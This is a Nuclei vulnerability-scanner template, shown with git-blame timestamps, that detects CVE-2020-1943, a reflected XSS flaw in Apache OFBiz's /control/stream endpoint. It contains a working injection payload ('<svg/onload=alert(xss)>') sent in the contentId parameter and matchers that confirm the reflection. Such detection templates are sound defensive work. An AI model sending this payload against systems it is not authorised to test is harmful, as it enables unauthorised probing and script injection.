nuclei-templates/cves/2020/CVE-2020-1943.yaml

31 lines
795 B
YAML
Raw Normal View History

2021-01-09 14:45:11 +00:00
id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
2021-04-06 06:46:11 +00:00
author: pdteam
2021-03-10 11:22:37 +00:00
description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
2021-01-09 14:45:11 +00:00
severity: medium
tags: cve,cve2020,apache,xss
2021-03-15 17:13:02 +00:00
reference:
- https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
2021-01-09 14:45:11 +00:00
requests:
- method: GET
path:
2021-03-04 16:02:34 +00:00
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
2021-01-09 14:45:11 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-03-04 16:02:34 +00:00
- "<svg/onload=alert(xss)>"
2021-01-09 14:45:11 +00:00
part: body
2021-01-11 06:44:22 +00:00
2021-01-09 14:45:11 +00:00
- type: word
words:
2021-01-11 06:44:22 +00:00
- "text/html"
2021-01-09 14:45:11 +00:00
part: header
2021-01-11 06:44:22 +00:00
- type: status
status:
- 200